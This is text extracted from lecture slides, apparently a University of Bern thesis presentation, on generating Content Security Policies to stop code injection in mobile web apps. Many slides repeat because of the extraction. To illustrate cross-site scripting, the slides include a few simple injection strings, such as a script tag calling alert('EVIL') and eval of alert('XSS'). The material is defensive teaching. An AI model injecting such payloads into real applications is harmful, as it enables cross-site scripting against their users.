![Page 1: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/1.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Autogenerating Content Security Policies toPrevent Code Injection in Mobile Web
Applications
Basil Schoni
Software Composition GroupInstitute of Computer Science
University of Berne
28.01.20
1 / 51
![Page 2: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/2.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
2 / 51
![Page 3: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/3.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What is a mobile web app?
A mobile web app is a mobile application that is written with webtechnologies (HTML/CSS/JS)
WebView: Wrapped browser engine that can interpret HTML,CSS and JS and provides a bridge mechanism to interact withnative code
Mobile Web Framework: Provides easy access to deviceresources accross operating systems by abstracting awayplatform differences
Advantage: Compatibility amongst mobile platforms
Disadvantage: Susceptibility to code injection attacks
3 / 51
![Page 4: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/4.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What is a mobile web app?
A mobile web app is a mobile application that is written with webtechnologies (HTML/CSS/JS)
WebView: Wrapped browser engine that can interpret HTML,CSS and JS and provides a bridge mechanism to interact withnative code
Mobile Web Framework: Provides easy access to deviceresources accross operating systems by abstracting awayplatform differences
Advantage: Compatibility amongst mobile platforms
Disadvantage: Susceptibility to code injection attacks
3 / 51
![Page 5: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/5.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What is a mobile web app?
A mobile web app is a mobile application that is written with webtechnologies (HTML/CSS/JS)
WebView: Wrapped browser engine that can interpret HTML,CSS and JS and provides a bridge mechanism to interact withnative code
Mobile Web Framework: Provides easy access to deviceresources accross operating systems by abstracting awayplatform differences
Advantage: Compatibility amongst mobile platforms
Disadvantage: Susceptibility to code injection attacks
3 / 51
![Page 6: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/6.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What is a mobile web app?
A mobile web app is a mobile application that is written with webtechnologies (HTML/CSS/JS)
WebView: Wrapped browser engine that can interpret HTML,CSS and JS and provides a bridge mechanism to interact withnative code
Mobile Web Framework: Provides easy access to deviceresources accross operating systems by abstracting awayplatform differences
Advantage: Compatibility amongst mobile platforms
Disadvantage: Susceptibility to code injection attacks
3 / 51
![Page 7: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/7.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What is a mobile web app?
A mobile web app is a mobile application that is written with webtechnologies (HTML/CSS/JS)
WebView: Wrapped browser engine that can interpret HTML,CSS and JS and provides a bridge mechanism to interact withnative code
Mobile Web Framework: Provides easy access to deviceresources accross operating systems by abstracting awayplatform differences
Advantage: Compatibility amongst mobile platforms
Disadvantage: Susceptibility to code injection attacks
3 / 51
![Page 8: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/8.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
4 / 51
![Page 9: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/9.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Code injection in web apps is a consequence of the fact that dataand code can be mixed.
1 Untrusted data is accepted by application
2 Unsafe data is not sanitized
3 Unsafe data is passed to DOM in an unsafe manner
4 Unsafe data is rendered, causing all present Javascript code tobe executed
5 / 51
![Page 10: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/10.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Code injection in web apps is a consequence of the fact that dataand code can be mixed.
1 Untrusted data is accepted by application
2 Unsafe data is not sanitized
3 Unsafe data is passed to DOM in an unsafe manner
4 Unsafe data is rendered, causing all present Javascript code tobe executed
5 / 51
![Page 11: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/11.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Code injection in web apps is a consequence of the fact that dataand code can be mixed.
1 Untrusted data is accepted by application
2 Unsafe data is not sanitized
3 Unsafe data is passed to DOM in an unsafe manner
4 Unsafe data is rendered, causing all present Javascript code tobe executed
5 / 51
![Page 12: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/12.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Code injection in web apps is a consequence of the fact that dataand code can be mixed.
1 Untrusted data is accepted by application
2 Unsafe data is not sanitized
3 Unsafe data is passed to DOM in an unsafe manner
4 Unsafe data is rendered, causing all present Javascript code tobe executed
5 / 51
![Page 13: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/13.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Code injection in web apps is a consequence of the fact that dataand code can be mixed.
1 Untrusted data is accepted by application
2 Unsafe data is not sanitized
3 Unsafe data is passed to DOM in an unsafe manner
4 Unsafe data is rendered, causing all present Javascript code tobe executed
5 / 51
![Page 14: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/14.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
<p>Some attacker-controlled string<p>
<p><script>alert(’EVIL’)</script></p>
6 / 51
![Page 15: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/15.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
<p>Some attacker-controlled string<p>
<p><script>alert(’EVIL’)</script></p>
6 / 51
![Page 16: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/16.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What are the differences to traditional web apps?
Code injection in mobile web apps differs in some ways frominjection in a ’normal’ browser.
Unconventional injection channels
BarcodesWiFi SSIDsFile metadata...
More severe impacts
More sensitive access via HTML5 (GPS, high-res cameras,always with its user)More extensive access via JS-interfaces (accelerometer,contacts, SMS, spreading of infection)
7 / 51
![Page 17: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/17.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What are the differences to traditional web apps?
Code injection in mobile web apps differs in some ways frominjection in a ’normal’ browser.
Unconventional injection channels
BarcodesWiFi SSIDsFile metadata...
More severe impacts
More sensitive access via HTML5 (GPS, high-res cameras,always with its user)More extensive access via JS-interfaces (accelerometer,contacts, SMS, spreading of infection)
7 / 51
![Page 18: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/18.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What are the differences to traditional web apps?
Code injection in mobile web apps differs in some ways frominjection in a ’normal’ browser.
Unconventional injection channels
BarcodesWiFi SSIDsFile metadata...
More severe impacts
More sensitive access via HTML5 (GPS, high-res cameras,always with its user)More extensive access via JS-interfaces (accelerometer,contacts, SMS, spreading of infection)
7 / 51
![Page 19: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/19.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What are the differences to traditional web apps?
Code injection in mobile web apps differs in some ways frominjection in a ’normal’ browser.
Unconventional injection channels
BarcodesWiFi SSIDsFile metadata...
More severe impacts
More sensitive access via HTML5 (GPS, high-res cameras,always with its user)More extensive access via JS-interfaces (accelerometer,contacts, SMS, spreading of infection)
7 / 51
![Page 20: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/20.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What are the differences to traditional web apps?
Code injection in mobile web apps differs in some ways frominjection in a ’normal’ browser.
Unconventional injection channels
BarcodesWiFi SSIDsFile metadata...
More severe impacts
More sensitive access via HTML5 (GPS, high-res cameras,always with its user)More extensive access via JS-interfaces (accelerometer,contacts, SMS, spreading of infection)
7 / 51
![Page 21: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/21.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
8 / 51
![Page 22: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/22.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Content Security Policy is a security mechanism that restricts whatresources can be loaded by the browser and whether some types ofJS/CSS code are blocked.
Directives: script-src, style-src, img-src, media-src,connect-src, plugin-types, ...
Origins/Keywords:https://example.ch, data:, ’self’,’unsafe-inline’, ’unsafe-eval’, ’sha-[hash]’, ’strict-dynamic’, ...
CSP rule: ”img-src ’self’ http://allowed.ch;”
Allowed: <img src=”image.png”>Allowed: <img src=”http://allowed.ch/image.png”>Disallowed: <img src=”http://disallowed.ch/image.png”>
CSP definition: <meta http-equiv=”Content-Security-Policy”content=”default-src ’self’; img-src http://allowed.ch;”>
9 / 51
![Page 23: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/23.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Content Security Policy is a security mechanism that restricts whatresources can be loaded by the browser and whether some types ofJS/CSS code are blocked.
Directives: script-src, style-src, img-src, media-src,connect-src, plugin-types, ...
Origins/Keywords:https://example.ch, data:, ’self’,’unsafe-inline’, ’unsafe-eval’, ’sha-[hash]’, ’strict-dynamic’, ...
CSP rule: ”img-src ’self’ http://allowed.ch;”
Allowed: <img src=”image.png”>Allowed: <img src=”http://allowed.ch/image.png”>Disallowed: <img src=”http://disallowed.ch/image.png”>
CSP definition: <meta http-equiv=”Content-Security-Policy”content=”default-src ’self’; img-src http://allowed.ch;”>
9 / 51
![Page 24: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/24.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Content Security Policy is a security mechanism that restricts whatresources can be loaded by the browser and whether some types ofJS/CSS code are blocked.
Directives: script-src, style-src, img-src, media-src,connect-src, plugin-types, ...
Origins/Keywords:https://example.ch, data:, ’self’,’unsafe-inline’, ’unsafe-eval’, ’sha-[hash]’, ’strict-dynamic’, ...
CSP rule: ”img-src ’self’ http://allowed.ch;”
Allowed: <img src=”image.png”>Allowed: <img src=”http://allowed.ch/image.png”>Disallowed: <img src=”http://disallowed.ch/image.png”>
CSP definition: <meta http-equiv=”Content-Security-Policy”content=”default-src ’self’; img-src http://allowed.ch;”>
9 / 51
![Page 25: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/25.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Content Security Policy is a security mechanism that restricts whatresources can be loaded by the browser and whether some types ofJS/CSS code are blocked.
Directives: script-src, style-src, img-src, media-src,connect-src, plugin-types, ...
Origins/Keywords:https://example.ch, data:, ’self’,’unsafe-inline’, ’unsafe-eval’, ’sha-[hash]’, ’strict-dynamic’, ...
CSP rule: ”img-src ’self’ http://allowed.ch;”
Allowed: <img src=”image.png”>Allowed: <img src=”http://allowed.ch/image.png”>Disallowed: <img src=”http://disallowed.ch/image.png”>
CSP definition: <meta http-equiv=”Content-Security-Policy”content=”default-src ’self’; img-src http://allowed.ch;”>
9 / 51
![Page 26: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/26.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Content Security Policy is a security mechanism that restricts whatresources can be loaded by the browser and whether some types ofJS/CSS code are blocked.
Directives: script-src, style-src, img-src, media-src,connect-src, plugin-types, ...
Origins/Keywords:https://example.ch, data:, ’self’,’unsafe-inline’, ’unsafe-eval’, ’sha-[hash]’, ’strict-dynamic’, ...
CSP rule: ”img-src ’self’ http://allowed.ch;”
Allowed: <img src=”image.png”>Allowed: <img src=”http://allowed.ch/image.png”>Disallowed: <img src=”http://disallowed.ch/image.png”>
CSP definition: <meta http-equiv=”Content-Security-Policy”content=”default-src ’self’; img-src http://allowed.ch;”>
9 / 51
![Page 27: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/27.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does it work?
Content Security Policy is a security mechanism that restricts whatresources can be loaded by the browser and whether some types ofJS/CSS code are blocked.
Directives: script-src, style-src, img-src, media-src,connect-src, plugin-types, ...
Origins/Keywords:https://example.ch, data:, ’self’,’unsafe-inline’, ’unsafe-eval’, ’sha-[hash]’, ’strict-dynamic’, ...
CSP rule: ”img-src ’self’ http://allowed.ch;”
Allowed: <img src=”image.png”>Allowed: <img src=”http://allowed.ch/image.png”>Disallowed: <img src=”http://disallowed.ch/image.png”>
CSP definition: <meta http-equiv=”Content-Security-Policy”content=”default-src ’self’; img-src http://allowed.ch;”>
9 / 51
![Page 28: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/28.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Sources to load data from
<img src=”https://example.ch”><embed src=”https://example.ch”><link rel=”stylesheet” href=”https://example.ch”><script src=”https://example.ch”>new Worker(’https://example.ch’);...
URLs to connect to
XMLHttpRequest.open(’GET’, ’https://example.ch’);new WebSocket(’https://example.ch’);<form action=”https://example.ch”>...
10 / 51
![Page 29: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/29.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Sources to load data from
<img src=”https://example.ch”><embed src=”https://example.ch”><link rel=”stylesheet” href=”https://example.ch”><script src=”https://example.ch”>new Worker(’https://example.ch’);...
URLs to connect to
XMLHttpRequest.open(’GET’, ’https://example.ch’);new WebSocket(’https://example.ch’);<form action=”https://example.ch”>...
10 / 51
![Page 30: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/30.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Sources to load data from
<img src=”https://example.ch”><embed src=”https://example.ch”><link rel=”stylesheet” href=”https://example.ch”><script src=”https://example.ch”>new Worker(’https://example.ch’);...
URLs to connect to
XMLHttpRequest.open(’GET’, ’https://example.ch’);new WebSocket(’https://example.ch’);<form action=”https://example.ch”>...
10 / 51
![Page 31: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/31.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Sources to load data from
<img src=”https://example.ch”><embed src=”https://example.ch”><link rel=”stylesheet” href=”https://example.ch”><script src=”https://example.ch”>new Worker(’https://example.ch’);...
URLs to connect to
XMLHttpRequest.open(’GET’, ’https://example.ch’);new WebSocket(’https://example.ch’);<form action=”https://example.ch”>...
10 / 51
![Page 32: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/32.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Inline scripts and styles
<script>alert(’XSS’)</script><div onclick=”alert(’XSS’)”><style>.content { width: 30px; } </style>document.querySelector(’div’).setAttribute(’style’, ’width:30px;’);...
Evaluation of strings in scripts and styles
eval(”alert(’XSS’)”)window.setTimeout(”alert(’XSS’)”, 1000);CSSStyleSheet.insertRule(”.content { width: 30px; }”)...
11 / 51
![Page 33: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/33.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Inline scripts and styles
<script>alert(’XSS’)</script><div onclick=”alert(’XSS’)”><style>.content { width: 30px; } </style>document.querySelector(’div’).setAttribute(’style’, ’width:30px;’);...
Evaluation of strings in scripts and styles
eval(”alert(’XSS’)”)window.setTimeout(”alert(’XSS’)”, 1000);CSSStyleSheet.insertRule(”.content { width: 30px; }”)...
11 / 51
![Page 34: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/34.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Inline scripts and styles
<script>alert(’XSS’)</script><div onclick=”alert(’XSS’)”><style>.content { width: 30px; } </style>document.querySelector(’div’).setAttribute(’style’, ’width:30px;’);...
Evaluation of strings in scripts and styles
eval(”alert(’XSS’)”)window.setTimeout(”alert(’XSS’)”, 1000);CSSStyleSheet.insertRule(”.content { width: 30px; }”)...
11 / 51
![Page 35: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/35.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Inline scripts and styles
<script>alert(’XSS’)</script><div onclick=”alert(’XSS’)”><style>.content { width: 30px; } </style>document.querySelector(’div’).setAttribute(’style’, ’width:30px;’);...
Evaluation of strings in scripts and styles
eval(”alert(’XSS’)”)window.setTimeout(”alert(’XSS’)”, 1000);CSSStyleSheet.insertRule(”.content { width: 30px; }”)...
11 / 51
![Page 36: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/36.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
What can be restricted?
Some other things
plugin-typesframe-ancestorsupgrade-insecure-requestsnavigate-to...
12 / 51
![Page 37: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/37.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>Such scripts are blocked by default”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 38: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/38.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>
Such scripts are blocked by default”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 39: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/39.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>Such scripts are blocked by default
”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 40: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/40.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>Such scripts are blocked by default”script-src unsafe-inline” can allow them
Using hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 41: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/41.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>Such scripts are blocked by default”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”
